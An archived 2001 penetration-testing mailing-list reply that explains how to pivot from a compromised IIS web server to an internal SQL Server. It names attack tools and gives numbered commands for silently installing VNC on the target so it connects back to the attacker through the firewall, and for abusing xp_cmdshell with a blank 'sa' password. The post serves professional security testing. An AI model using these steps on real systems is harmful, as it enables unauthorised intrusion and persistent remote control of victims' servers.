Re: [PEN-TEST] Web Server to SQL Server

From: H D Moore (hdmat_private)
Date: Thu Apr 12 2001 - 20:54:00 PDT

  • Next message: Steve Skoronski: "[PEN-TEST] RPC enumeration"

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    There are a few ways to go about this:
    
    1. Upload a tool to the IIS box which runs a SQL query against the
    database server.  You could try sqlexec.exe (packetstorm) or even create an
    ASP script on the server which relays a request to the database server. If the
    /msadc RDS component is available you can try using my sqlrds.pl tool to
    relay a request to the server through that.  The sqlrds.pl script is available from
    http://www.digitaloffense.net/csw/
    
    2. Get a GUI interface on the IIS server.  Install VNC on the IIS server after
    elevating your access with hk.exe or cmdasp.asp. You can run the VNC
    server in outbound mode and run the client in listen mode, so that should
    get you through the firewall.  To install VNC remotely:
    
    a. Install VNC on a local machine, set a password and any options.
    b. Open RegEdit, export the HKLM/Software/ORL key to a file.
    c. Copy winvnc.exe, vnchooks.dll, and omnithread_rt.dll to the target's \winnt\system32 directory
    d. Copy your exported registry file to the target, import with regedit <filename>.reg
    e. Execute winvnc -install on the target system
    d. Execute net start winvnc
    f. Execute vncviewer -listen on the attacking system
    g. Execute winvnc -connect <your ip> and enjoy your desktop ;)
    
    3. Owning the SQL server.  With a blank "sa" account, this should be trivial. Just execute
    the xp_cmdshell stored procedure and follow the above steps to get a VNC desktop.
    
    For more info, check out my CanSecWest/core01 presentation, available online at
    http://www.digitaloffense.net/csw/ or read the excellent material available from
    http://www.sqlsecurity.com/
    
    - -HD
    
    Senior Security Analyst
    Digital Defense Incorporated
    http://www.digitaldefense.net/
    
    
    On Wednesday 11 April 2001 10:52 pm, myrddin_eat_private wrote:
    > Once I have done this, the only traffic into the internal network allowed
    > from the IIS server will be on port 1433. The SQL server will have a blank
    > 'sa' password. How would I then proceed to bust the SQL server? I know I
    > can do this if I install Perl on the IIS server and place the needed tools
    > on the box, but that requires GUI access to the IIS server (right?). Other
    > than setting up a port redirector like FPipe, how would you go about this?
    >
    > Free, encrypted, secure Web-based email at www.hushmail.com
    
    -----BEGIN PGP SIGNATURE-----
    Version: PGP 6.5.8
    
    iQA/AwUBOtZ4WTwRvqMPEDLhEQImKgCfSCpzTLunnAc0jF9GhrkRCbwHJ9gAoIsH
    Fy1y25z9JgJ7LvpLbLi6VrAu
    =gcga
    -----END PGP SIGNATURE-----
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 09:18:06 PDT